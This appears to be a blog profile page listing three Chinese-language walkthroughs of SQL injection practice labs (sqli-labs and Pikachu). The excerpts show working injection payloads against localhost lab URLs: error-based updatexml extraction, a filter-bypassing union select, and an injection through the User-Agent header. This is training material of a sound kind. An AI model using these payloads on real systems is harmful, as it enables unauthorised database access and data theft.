- 博客(3)
- 收藏
- 关注
原创 Sql-labs 靶场(46-53)
目录第 46 关第 47 关第 48 关第 49 关第 50-53 关本关使用的是 order by 排序不同于where后面的注入,它不可以使用union联合查询注入,但可以用盲注、时间、报错等函数进行注入① 判断闭合符不管输入字符型什么闭合符都报错,然后使用数值 1=1、1=2 都不报错 进一步判断② 判断数据库在进行获取数据库时分别使用了字符型和数字型最后发现是数字型http://127.0.0.1/sql/Less-46/?sort=1 and updatexml(1,concat(2,(selec
2024-09-24 17:23:59 530
原创 Sql-labs 靶场(20-30)
语法:http://127.0.0.1/sql/Less-26/?id=0')%a0UniOn%a0SeleCt%a01,group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_schema='security'%a0and%a0table_name='users'%a0or('语法:http://127.0.0.1/sql/Less-27/?
2024-09-24 07:41:07 409
原创 Pikachu靶场-SQL注入
语法:User-Agent: 1' and updatexml(1,concat(2,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='pikachu')),3) or ' 1=1。
2024-09-20 14:54:46 1170
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人